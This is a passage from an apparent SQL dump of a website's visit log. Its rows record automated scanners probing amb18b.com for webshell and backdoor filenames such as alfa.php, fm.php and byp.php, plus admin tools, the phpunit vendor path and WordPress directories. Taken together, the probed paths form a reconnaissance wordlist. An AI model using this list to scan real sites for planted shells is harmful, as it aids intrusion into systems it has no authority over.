18:42:57'),(9663,'https://amb18b.com//xmlrpc.php','159.89.184.20','Direct Access',1,'2025-11-23 18:42:59','2025-11-23 18:42:59'),(9664,'https://amb18b.com/wordpress','20.251.204.209','Direct Access',1,'2025-11-23 19:00:12','2025-11-23 19:00:12'),(9665,'https://amb18b.com/wp','20.251.204.209','Direct Access',1,'2025-11-23 19:00:16','2025-11-23 19:00:16'),(9666,'https://amb18b.com/bc','20.251.204.209','Direct Access',1,'2025-11-23 19:00:17','2025-11-23 19:00:17'),(9667,'https://amb18b.com/bk','20.251.204.209','Direct Access',1,'2025-11-23 19:00:18','2025-11-23 19:00:18'),(9668,'https://amb18b.com/backup','20.251.204.209','Direct Access',1,'2025-11-23 19:00:20','2025-11-23 19:00:20'),(9669,'https://amb18b.com/old','20.251.204.209','Direct Access',1,'2025-11-23 19:00:21','2025-11-23 19:00:21'),(9670,'https://amb18b.com/new','20.251.204.209','Direct Access',1,'2025-11-23 19:00:22','2025-11-23 19:00:22'),(9671,'https://amb18b.com/main','20.251.204.209','Direct Access',1,'2025-11-23 19:00:24','2025-11-23 19:00:24'),(9672,'https://amb18b.com/file4.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:06','2025-11-23 21:21:06'),(9673,'https://amb18b.com/lv.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:07','2025-11-23 21:21:07'),(9674,'https://amb18b.com/golden.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:08','2025-11-23 21:21:08'),(9675,'https://amb18b.com/pp.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:09','2025-11-23 21:21:09'),(9676,'https://amb18b.com/file.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:10','2025-11-23 21:21:10'),(9677,'https://amb18b.com/fm.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:11','2025-11-23 21:21:11'),(9678,'https://amb18b.com/file2.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:12','2025-11-23 21:21:12'),(9679,'https://amb18b.com/ffile.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:13','2025-11-23 21:21:13'),(9680,'https://amb18b.com/alfa.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:14','2025-11-23 21:21:14'),(9681,'https://amb18b.com/re.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:15','2025-11-23 21:21:15'),(9682,'https://amb18b.com/adminer.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:16','2025-11-23 21:21:16'),(9683,'https://amb18b.com/bolt.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:17','2025-11-23 21:21:17'),(9684,'https://amb18b.com/file7.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:18','2025-11-23 21:21:18'),(9685,'https://amb18b.com/gmo.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:19','2025-11-23 21:21:19'),(9686,'https://amb18b.com/bless2.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:20','2025-11-23 21:21:20'),(9687,'https://amb18b.com/wp-blog.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:22','2025-11-23 21:21:22'),(9688,'https://amb18b.com/wp-class.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:23','2025-11-23 21:21:23'),(9689,'https://amb18b.com/wsa.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:24','2025-11-23 21:21:24'),(9690,'https://amb18b.com/z.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:25','2025-11-23 21:21:25'),(9691,'https://amb18b.com/nc4.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:26','2025-11-23 21:21:26'),(9692,'https://amb18b.com/ahax.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:27','2025-11-23 21:21:27'),(9693,'https://amb18b.com/dejavu.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:28','2025-11-23 21:21:28'),(9694,'https://amb18b.com/config.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:29','2025-11-23 21:21:29'),(9695,'https://amb18b.com/atomlib.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:30','2025-11-23 21:21:30'),(9696,'https://amb18b.com/css.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:31','2025-11-23 21:21:31'),(9697,'https://amb18b.com/past.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:32','2025-11-23 21:21:32'),(9698,'https://amb18b.com/admin.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:33','2025-11-23 21:21:33'),(9699,'https://amb18b.com/ol.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:35','2025-11-23 21:21:35'),(9700,'https://amb18b.com/we.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:36','2025-11-23 21:21:36'),(9701,'https://amb18b.com/404.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:37','2025-11-23 21:21:37'),(9702,'https://amb18b.com/goods.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:38','2025-11-23 21:21:38'),(9703,'https://amb18b.com/build.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:39','2025-11-23 21:21:39'),(9704,'https://amb18b.com/ot.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:40','2025-11-23 21:21:40'),(9705,'https://amb18b.com/lc.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:41','2025-11-23 21:21:41'),(9706,'https://amb18b.com/cool.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:42','2025-11-23 21:21:42'),(9707,'https://amb18b.com/manager.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:43','2025-11-23 21:21:43'),(9708,'https://amb18b.com/aa.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:44','2025-11-23 21:21:44'),(9709,'https://amb18b.com/gfile.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:45','2025-11-23 21:21:45'),(9710,'https://amb18b.com/file5.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:46','2025-11-23 21:21:46'),(9711,'https://amb18b.com/k.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:47','2025-11-23 21:21:47'),(9712,'https://amb18b.com/num.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:48','2025-11-23 21:21:48'),(9713,'https://amb18b.com/astab.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:49','2025-11-23 21:21:49'),(9714,'https://amb18b.com/xl.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:50','2025-11-23 21:21:50'),(9715,'https://amb18b.com/file17.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:51','2025-11-23 21:21:51'),(9716,'https://amb18b.com/pepe.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:52','2025-11-23 21:21:52'),(9717,'https://amb18b.com/about.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:53','2025-11-23 21:21:53'),(9718,'https://amb18b.com/wp-update.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:54','2025-11-23 21:21:54'),(9719,'https://amb18b.com/bless.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:55','2025-11-23 21:21:55'),(9720,'https://amb18b.com/faq.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:56','2025-11-23 21:21:56'),(9721,'https://amb18b.com/abcd.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:57','2025-11-23 21:21:57'),(9722,'https://amb18b.com/CLA.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:58','2025-11-23 21:21:58'),(9723,'https://amb18b.com/chosen.php','172.192.40.201','Direct Access',1,'2025-11-23 21:21:59','2025-11-23 21:21:59'),(9724,'https://amb18b.com/wp-mn.php','172.192.40.201','Direct Access',1,'2025-11-23 21:22:01','2025-11-23 21:22:01'),(9725,'https://amb18b.com/ss.php','172.192.40.201','Direct Access',1,'2025-11-23 21:22:02','2025-11-23 21:22:02'),(9726,'https://amb18b.com/wp-logiin.php','172.192.40.201','Direct Access',1,'2025-11-23 21:22:03','2025-11-23 21:22:03'),(9727,'https://amb18b.com/xmrlpc.php','255.147.68.1','https://www.bing.com/',1,'2025-11-24 01:02:19','2025-11-24 01:02:19'),(9728,'https://amb18b.com/abcd.php','192.219.7.73','https://www.yahoo.com/',1,'2025-11-24 01:02:22','2025-11-24 01:02:22'),(9729,'https://amb18b.com/admin.php','1.27.226.112','https://duckduckgo.com/',1,'2025-11-24 01:02:24','2025-11-24 01:02:24'),(9730,'https://amb18b.com/info.php','122.29.229.204','https://www.google.co.uk/',1,'2025-11-24 01:02:26','2025-11-24 01:02:26'),(9731,'https://amb18b.com/edit.php','1.127.252.109','https://www.bing.com/',1,'2025-11-24 01:02:28','2025-11-24 01:02:28'),(9732,'https://amb18b.com/moon.php','175.16.216.110','https://www.google.de/',1,'2025-11-24 01:02:29','2025-11-24 01:02:29'),(9733,'https://amb18b.com/classwithtostring.php','82.82.220.54','https://www.bing.com/',1,'2025-11-24 01:02:31','2025-11-24 01:02:31'),(9734,'https://amb18b.com/file4.php','172.146.66.70','https://www.bing.com/',1,'2025-11-24 01:02:33','2025-11-24 01:02:33'),(9735,'https://amb18b.com/ioxi-o.php','21.224.167.199','https://www.google.com/',1,'2025-11-24 01:02:35','2025-11-24 01:02:35'),(9736,'https://amb18b.com/wp-good.php','177.4.235.102','https://www.google.de/',1,'2025-11-24 01:02:37','2025-11-24 01:02:37'),(9737,'https://amb18b.com/ds.php','225.10.139.130','https://www.yahoo.com/',1,'2025-11-24 01:02:38','2025-11-24 01:02:38'),(9738,'https://amb18b.com/bolt.php','124.153.159.174','https://www.google.co.uk/',1,'2025-11-24 01:02:40','2025-11-24 01:02:40'),(9739,'https://amb18b.com/new.php','64.201.36.206','https://www.yahoo.com/',1,'2025-11-24 01:02:42','2025-11-24 01:02:42'),(9740,'https://amb18b.com/wp-includes/js/','223.134.71.121','https://www.yahoo.com/',1,'2025-11-24 01:02:43','2025-11-24 01:02:43'),(9741,'https://amb18b.com/wp-includes/pomo/','243.230.105.142','https://duckduckgo.com/',1,'2025-11-24 01:02:45','2025-11-24 01:02:45'),(9742,'https://amb18b.com/wp-includes/rest-api/','71.185.25.17','https://www.google.com/',1,'2025-11-24 01:02:47','2025-11-24 01:02:47'),(9743,'https://amb18b.com/wp-includes/widgets/','69.219.35.209','https://www.google.fr/',1,'2025-11-24 01:02:48','2025-11-24 01:02:48'),(9744,'https://amb18b.com/wp-admin/css/','67.158.112.78','https://www.google.com/',1,'2025-11-24 01:02:50','2025-11-24 01:02:50'),(9745,'https://amb18b.com/wp-admin/images/','36.154.59.226','https://duckduckgo.com/',1,'2025-11-24 01:02:52','2025-11-24 01:02:52'),(9746,'https://amb18b.com/wp-admin/maint/','8.26.148.237','https://www.yahoo.com/',1,'2025-11-24 01:02:53','2025-11-24 01:02:53'),(9747,'https://amb18b.com/wp-admin/meta/','213.82.203.194','https://www.google.co.uk/',1,'2025-11-24 01:02:55','2025-11-24 01:02:55'),(9748,'https://amb18b.com/wp-admin/includes/','176.161.224.16','https://www.bing.com/',1,'2025-11-24 01:03:01','2025-11-24 01:03:01'),(9749,'https://amb18b.com/wp-includes/','201.84.156.53','https://www.google.de/',1,'2025-11-24 01:03:08','2025-11-24 01:03:08'),(9750,'https://amb18b.com/wp-includes/css/','1.239.28.97','https://www.google.com/',1,'2025-11-24 01:03:10','2025-11-24 01:03:10'),(9751,'https://amb18b.com/wp-includes/ID3/','154.9.252.169','https://www.yahoo.com/',1,'2025-11-24 01:03:12','2025-11-24 01:03:12'),(9752,'https://amb18b.com/wp-includes/IXR/','187.226.19.151','https://www.google.com/',1,'2025-11-24 01:03:13','2025-11-24 01:03:13'),(9753,'https://amb18b.com/wp-includes/Requests/','152.43.10.189','https://www.google.de/',1,'2025-11-24 01:03:15','2025-11-24 01:03:15'),(9754,'https://amb18b.com/wp-includes/SimplePie/','6.74.143.4','https://www.google.co.uk/',1,'2025-11-24 01:03:17','2025-11-24 01:03:17'),(9755,'https://amb18b.com/wp-includes/Text/','186.235.179.66','https://www.bing.com/',1,'2025-11-24 01:03:19','2025-11-24 01:03:19'),(9756,'https://amb18b.com/wp-includes/Text/Diff/Renderer/','182.108.172.213','https://www.google.co.uk/',1,'2025-11-24 01:03:34','2025-11-24 01:03:34'),(9757,'https://amb18b.com/wp-includes/certificates/','55.2.177.145','https://www.bing.com/',1,'2025-11-24 01:03:36','2025-11-24 01:03:36'),(9758,'https://amb18b.com/wp-includes/customize/','60.243.102.255','https://www.google.co.uk/',1,'2025-11-24 01:03:38','2025-11-24 01:03:38'),(9759,'https://amb18b.com/wp-includes/fonts/','150.65.192.207','https://www.google.fr/',1,'2025-11-24 01:03:40','2025-11-24 01:03:40'),(9760,'https://amb18b.com/wp-includes/images/','121.200.109.142','https://www.google.de/',1,'2025-11-24 01:03:42','2025-11-24 01:03:42'),(9761,'https://amb18b.com/.well-known/','190.151.39.218','https://www.google.com/',1,'2025-11-24 01:03:44','2025-11-24 01:03:44'),(9762,'https://amb18b.com/ALFA_DATA/','129.102.165.148','https://www.yahoo.com/',1,'2025-11-24 01:03:45','2025-11-24 01:03:45'),(9763,'https://amb18b.com/.well-knownold/','214.151.81.144','https://www.google.com/',1,'2025-11-24 01:03:48','2025-11-24 01:03:48'),(9764,'https://amb18b.com/.well-known/acme-challenge/','74.139.133.50','https://www.google.de/',1,'2025-11-24 01:03:50','2025-11-24 01:03:50'),(9765,'https://amb18b.com/cgi-bin/','237.24.100.187','https://www.bing.com/',1,'2025-11-24 01:03:51','2025-11-24 01:03:51'),(9766,'https://amb18b.com/uploads/','68.126.61.212','https://duckduckgo.com/',1,'2025-11-24 01:03:53','2025-11-24 01:03:53'),(9767,'https://amb18b.com/upload/','201.185.21.39','https://www.google.fr/',1,'2025-11-24 01:03:55','2025-11-24 01:03:55'),(9768,'https://amb18b.com/admin/uploads/','197.197.143.94','https://duckduckgo.com/',1,'2025-11-24 01:03:56','2025-11-24 01:03:56'),(9769,'https://amb18b.com/Admin/uploads/','55.197.17.59','https://www.yahoo.com/',1,'2025-11-24 01:03:58','2025-11-24 01:03:58'),(9770,'https://amb18b.com/admin/','205.216.74.186','https://www.google.de/',1,'2025-11-24 01:04:00','2025-11-24 01:04:00'),(9771,'https://amb18b.com/images/','160.6.66.2','https://duckduckgo.com/',1,'2025-11-24 01:04:01','2025-11-24 01:04:01'),(9772,'https://amb18b.com/assets/','44.48.127.88','https://www.bing.com/',1,'2025-11-24 01:04:03','2025-11-24 01:04:03'),(9773,'https://amb18b.com/vendor/phpunit/phpunit/src/Util/PHP/','243.75.206.28','https://duckduckgo.com/',1,'2025-11-24 01:04:05','2025-11-24 01:04:05'),(9774,'https://amb18b.com/upload/image/','28.97.251.212','https://www.google.de/',1,'2025-11-24 01:04:07','2025-11-24 01:04:07'),(9775,'https://amb18b.com/assets/images/','122.196.36.220','https://www.google.de/',1,'2025-11-24 01:04:08','2025-11-24 01:04:08'),(9776,'https://amb18b.com/Public/','8.45.227.211','https://www.bing.com/',1,'2025-11-24 01:04:10','2025-11-24 01:04:10'),(9777,'https://amb18b.com/vendor/','30.102.96.54','https://www.google.de/',1,'2025-11-24 01:04:12','2025-11-24 01:04:12'),(9778,'https://amb18b.com/local/','135.34.116.225','https://duckduckgo.com/',1,'2025-11-24 01:04:13','2025-11-24 01:04:13'),(9779,'https://amb18b.com/modules/','15.226.19.6','https://www.google.fr/',1,'2025-11-24 01:04:15','2025-11-24 01:04:15'),(9780,'https://amb18b.com/Site/','201.143.122.113','https://www.google.fr/',1,'2025-11-24 01:04:17','2025-11-24 01:04:17'),(9781,'https://amb18b.com/system/','110.99.243.158','https://www.google.fr/',1,'2025-11-24 01:04:18','2025-11-24 01:04:18'),(9782,'https://amb18b.com/template/','134.53.146.40','https://www.bing.com/',1,'2025-11-24 01:04:20','2025-11-24 01:04:20'),(9783,'https://amb18b.com/shop/','153.251.13.121','https://duckduckgo.com/',1,'2025-11-24 01:04:22','2025-11-24 01:04:22'),(9784,'https://amb18b.com/files/','122.70.102.33','https://www.yahoo.com/',1,'2025-11-24 01:04:23','2025-11-24 01:04:23'),(9785,'https://amb18b.com/admin/editor/','175.108.197.46','https://www.google.com/',1,'2025-11-24 01:04:25','2025-11-24 01:04:25'),(9786,'https://amb18b.com/include/','254.38.190.31','https://www.google.fr/',1,'2025-11-24 01:04:27','2025-11-24 01:04:27'),(9787,'https://amb18b.com/Assets/','90.185.127.237','https://www.google.de/',1,'2025-11-24 01:04:29','2025-11-24 01:04:29'),(9788,'https://amb18b.com/images/stories/','235.202.26.231','https://www.google.com/',1,'2025-11-24 01:04:31','2025-11-24 01:04:31'),(9789,'https://amb18b.com/plugins/','99.72.53.174','https://www.yahoo.com/',1,'2025-11-24 01:04:32','2025-11-24 01:04:32'),(9790,'https://amb18b.com/php/','131.53.34.226','https://www.google.com/',1,'2025-11-24 01:04:34','2025-11-24 01:04:34'),(9791,'https://amb18b.com/wp-includes/assets/','131.28.246.114','https://www.google.com/',1,'2025-11-24 01:04:36','2025-11-24 01:04:36'),(9792,'https://amb18b.com/wp-includes/Text/Diff/Engine/','15.89.79.167','https://www.google.fr/',1,'2025-11-24 01:04:38','2025-11-24 01:04:38'),(9793,'https://amb18b.com/wp-includes/block-patterns/','37.22.181.113','https://duckduckgo.com/',1,'2025-11-24 01:04:39','2025-11-24 01:04:39'),(9794,'https://amb18b.com/wp-includes/Text/Diff/','57.11.51.143','https://duckduckgo.com/',1,'2025-11-24 01:04:41','2025-11-24 01:04:41'),(9795,'https://amb18b.com/wp-includes/block-supports/','79.23.164.112','https://www.google.com/',1,'2025-11-24 01:04:43','2025-11-24 01:04:43'),(9796,'https://amb18b.com/wp-includes/SimplePie/Cache/','242.112.139.40','https://www.google.co.uk/',1,'2025-11-24 01:04:45','2025-11-24 01:04:45'),(9797,'https://amb18b.com/wp-includes/SimplePie/Content/Type/','198.211.202.82','https://www.google.de/',1,'2025-11-24 01:04:47','2025-11-24 01:04:47'),(9798,'https://amb18b.com/wp-includes/SimplePie/Content/','164.52.126.114','https://www.google.co.uk/',1,'2025-11-24 01:04:48','2025-11-24 01:04:48'),(9799,'https://amb18b.com/wp-includes/rest-api/endpoints/','90.129.124.255','https://www.google.de/',1,'2025-11-24 01:04:52','2025-11-24 01:04:52'),(9800,'https://amb18b.com/wp-includes/rest-api/fields/','4.190.168.188','https://www.google.co.uk/',1,'2025-11-24 01:04:54','2025-11-24 01:04:54'),(9801,'https://amb18b.com/wp-includes/Requests/Cookie/','54.209.134.138','https://www.google.de/',1,'2025-11-24 01:04:55','2025-11-24 01:04:55'),(9802,'https://amb18b.com/wp-includes/Requests/Proxy/','237.103.135.232','https://www.bing.com/',1,'2025-11-24 01:04:57','2025-11-24 01:04:57'),(9803,'https://amb18b.com/wp-includes/Requests/Response/','151.188.161.82','https://www.google.co.uk/',1,'2025-11-24 01:04:59','2025-11-24 01:04:59'),(9804,'https://amb18b.com/wp-includes/Requests/Transport/','69.108.96.114','https://www.google.fr/',1,'2025-11-24 01:05:01','2025-11-24 01:05:01'),(9805,'https://amb18b.com/wp-includes/Requests/Utility/','191.252.100.12','https://www.google.co.uk/',1,'2025-11-24 01:05:02','2025-11-24 01:05:02'),(9806,'https://amb18b.com/wp-includes/js/codemirror/','199.197.251.239','https://www.google.fr/',1,'2025-11-24 01:05:04','2025-11-24 01:05:04'),(9807,'https://amb18b.com/wp-includes/Requests/Exception/HTTP/','243.181.155.173','https://www.bing.com/',1,'2025-11-24 01:05:07','2025-11-24 01:05:07'),(9808,'https://amb18b.com/wp-includes/js/crop/','31.174.166.203','https://www.yahoo.com/',1,'2025-11-24 01:05:08','2025-11-24 01:05:08'),(9809,'https://amb18b.com/wp-includes/images/crystal/','216.243.105.173','https://www.yahoo.com/',1,'2025-11-24 01:05:10','2025-11-24 01:05:10'),(9810,'https://amb18b.com/wp-includes/images/media/','181.203.53.53','https://duckduckgo.com/',1,'2025-11-24 01:05:12','2025-11-24 01:05:12'),(9811,'https://amb18b.com/wp-includes/images/smilies/','31.64.41.1','https://www.google.com/',1,'2025-11-24 01:05:14','2025-11-24 01:05:14'),(9812,'https://amb18b.com/wp-includes/images/wlw/','58.146.191.89','https://www.google.fr/',1,'2025-11-24 01:05:16','2025-11-24 01:05:16'),(9813,'https://amb18b.com/wp-includes/rest-api/search/','20.110.40.196','https://www.google.com/',1,'2025-11-24 01:05:18','2025-11-24 01:05:18'),(9814,'https://amb18b.com/wp-includes/Requests/Exception/','52.251.198.251','https://www.google.com/',1,'2025-11-24 01:05:20','2025-11-24 01:05:20'),(9815,'https://amb18b.com/wp-includes/Requests/Auth/','147.153.194.92','https://www.google.fr/',1,'2025-11-24 01:05:21','2025-11-24 01:05:21'),(9816,'https://amb18b.com/wp-includes/sodium_compat/src/','84.180.55.28','https://www.google.com/',1,'2025-11-24 01:05:23','2025-11-24 01:05:23'),(9817,'https://amb18b.com/wp-includes/sitemaps/providers/','133.15.149.58','https://duckduckgo.com/',1,'2025-11-24 01:05:25','2025-11-24 01:05:25'),(9818,'https://amb18b.com/wp-includes/Text/Diff/Engine/Engine/','130.0.38.75','https://duckduckgo.com/',1,'2025-11-24 01:05:26','2025-11-24 01:05:26'),(9819,'https://amb18b.com/wp-includes/html-api/','160.53.84.106','https://www.google.fr/',1,'2025-11-24 01:05:28','2025-11-24 01:05:28'),(9820,'https://amb18b.com/wp-includes/php-compat/','158.205.1.142','https://www.google.de/',1,'2025-11-24 01:05:30','2025-11-24 01:05:30'),(9821,'https://amb18b.com/wp-includes/PHPMailer/','182.101.6.192','https://www.google.com/',1,'2025-11-24 01:05:32','2025-11-24 01:05:32'),(9822,'https://amb18b.com/wp-includes/random_compat/','105.175.18.105','https://www.google.de/',1,'2025-11-24 01:05:34','2025-11-24 01:05:34'),(9823,'https://amb18b.com/wp-includes/sitemaps/','102.190.207.206','https://www.google.co.uk/',1,'2025-11-24 01:05:35','2025-11-24 01:05:35'),(9824,'https://amb18b.com/wp-includes/sodium_compat/','82.83.27.36','https://www.bing.com/',1,'2025-11-24 01:05:37','2025-11-24 01:05:37'),(9825,'https://amb18b.com/wp-includes/style-engine/','80.147.252.157','https://www.google.co.uk/',1,'2025-11-24 01:05:39','2025-11-24 01:05:39'),(9826,'https://amb18b.com/wp-includes/theme-compat/','192.244.203.71','https://www.bing.com/',1,'2025-11-24 01:05:41','2025-11-24 01:05:41'),(9827,'https://amb18b.com/wp-admin/css/colors/ectoplasm/','121.16.56.129','https://www.google.co.uk/',1,'2025-11-24 01:05:43','2025-11-24 01:05:43'),(9828,'https://amb18b.com/wp-admin/css/colors/','228.34.247.146','https://duckduckgo.com/',1,'2025-11-24 01:05:45','2025-11-24 01:05:45'),(9829,'https://amb18b.com/admin/images/slider/','51.103.72.30','https://www.google.co.uk/',1,'2025-11-24 01:05:46','2025-11-24 01:05:46'),(9830,'https://amb18b.com/admin/fckeditor/editor/filemanager/','149.234.151.50','https://www.yahoo.com/',1,'2025-11-24 01:05:48','2025-11-24 01:05:48'),(9831,'https://amb18b.com/sites/default/files/','157.119.215.40','https://www.google.co.uk/',1,'2025-11-24 01:05:50','2025-11-24 01:05:50'),(9832,'https://amb18b.com/admin/controller/extension/extension/','27.41.215.12','https://www.yahoo.com/',1,'2025-11-24 01:05:51','2025-11-24 01:05:51'),(9833,'https://amb18b.com/modules/mod_simplefileuploadv1.3/elements/','58.164.47.32','https://www.google.fr/',1,'2025-11-24 01:05:53','2025-11-24 01:05:53'),(9834,'https://amb18b.com/components/','45.102.133.254','https://www.google.fr/',1,'2025-11-24 01:05:55','2025-11-24 01:05:55'),(9835,'https://amb18b.com/admin/uploads/images/','145.206.235.48','https://www.google.de/',1,'2025-11-24 01:05:57','2025-11-24 01:05:57'),(9836,'https://amb18b.com/goods.php','172.192.40.201','Direct Access',1,'2025-11-24 05:35:53','2025-11-24 05:35:53'),(9837,'https://amb18b.com/zc-729.php','172.192.40.201','Direct Access',1,'2025-11-24 05:35:54','2025-11-24 05:35:54'),(9838,'https://amb18b.com/gecko.php','172.192.40.201','Direct Access',1,'2025-11-24 05:35:55','2025-11-24 05:35:55'),(9839,'https://amb18b.com/2co_ipn_sub.php','172.192.40.201','Direct Access',1,'2025-11-24 05:35:56','2025-11-24 05:35:56'),(9840,'https://amb18b.com/muscovadite.php','172.192.40.201','Direct Access',1,'2025-11-24 05:35:57','2025-11-24 05:35:57'),(9841,'https://amb18b.com/nonesoterically.php','172.192.40.201','Direct Access',1,'2025-11-24 05:35:58','2025-11-24 05:35:58'),(9842,'https://amb18b.com/yuk.php','172.192.40.201','Direct Access',1,'2025-11-24 05:35:59','2025-11-24 05:35:59'),(9843,'https://amb18b.com/Contrller.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:01','2025-11-24 05:36:01'),(9844,'https://amb18b.com/starry.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:02','2025-11-24 05:36:02'),(9845,'https://amb18b.com/t.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:03','2025-11-24 05:36:03'),(9846,'https://amb18b.com/byp7.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:04','2025-11-24 05:36:04'),(9847,'https://amb18b.com/0x.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:05','2025-11-24 05:36:05'),(9848,'https://amb18b.com/s.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:06','2025-11-24 05:36:06'),(9849,'https://amb18b.com/unwattled.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:07','2025-11-24 05:36:07'),(9850,'https://amb18b.com/ww1.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:08','2025-11-24 05:36:08'),(9851,'https://amb18b.com/wp-blog-front.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:10','2025-11-24 05:36:10'),(9852,'https://amb18b.com/xtt.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:11','2025-11-24 05:36:11'),(9853,'https://amb18b.com/ahax.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:12','2025-11-24 05:36:12'),(9854,'https://amb18b.com/raw.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:13','2025-11-24 05:36:13'),(9855,'https://amb18b.com/diesinker.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:14','2025-11-24 05:36:14'),(9856,'https://amb18b.com/dinah.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:15','2025-11-24 05:36:15'),(9857,'https://amb18b.com/washland.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:16','2025-11-24 05:36:16'),(9858,'https://amb18b.com/prototheria.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:17','2025-11-24 05:36:17'),(9859,'https://amb18b.com/microspore.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:18','2025-11-24 05:36:18'),(9860,'https://amb18b.com/sx.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:19','2025-11-24 05:36:19'),(9861,'https://amb18b.com/wpc2.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:20','2025-11-24 05:36:20'),(9862,'https://amb18b.com/2co_ipn.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:22','2025-11-24 05:36:22'),(9863,'https://amb18b.com/speculative.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:23','2025-11-24 05:36:23'),(9864,'https://amb18b.com/hans.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:24','2025-11-24 05:36:24'),(9865,'https://amb18b.com/krypton.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:25','2025-11-24 05:36:25'),(9866,'https://amb18b.com/acholuria.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:26','2025-11-24 05:36:26'),(9867,'https://amb18b.com/byp.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:27','2025-11-24 05:36:27'),(9868,'https://amb18b.com/x.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:28','2025-11-24 05:36:28'),(9869,'https://amb18b.com/ghreshttryu.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:30','2025-11-24 05:36:30'),(9870,'https://amb18b.com/aporrhiegma.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:31','2025-11-24 05:36:31'),(9871,'https://amb18b.com/byp8.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:32','2025-11-24 05:36:32'),(9872,'https://amb18b.com/clss.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:33','2025-11-24 05:36:33'),(9873,'https://amb18b.com/qaez.php56','172.192.40.201','Direct Access',1,'2025-11-24 05:36:34','2025-11-24 05:36:34'),(9874,'https://amb18b.com/lanbai.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:35','2025-11-24 05:36:35'),(9875,'https://amb18b.com/cord.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:36','2025-11-24 05:36:36'),(9876,'https://amb18b.com/xl6.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:38','2025-11-24 05:36:38'),(9877,'https://amb18b.com/fm.php?=','172.192.40.201','Direct Access',1,'2025-11-24 05:36:39','2025-11-24 05:36:39'),(9878,'https://amb18b.com/domains.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:40','2025-11-24 05:36:40'),(9879,'https://amb18b.com/lock360.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:41','2025-11-24 05:36:41'),(9880,'https://amb18b.com/d12.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:42','2025-11-24 05:36:42'),(9881,'https://amb18b.com/boyfile.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:43','2025-11-24 05:36:43'),(9882,'https://amb18b.com/atex1.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:44','2025-11-24 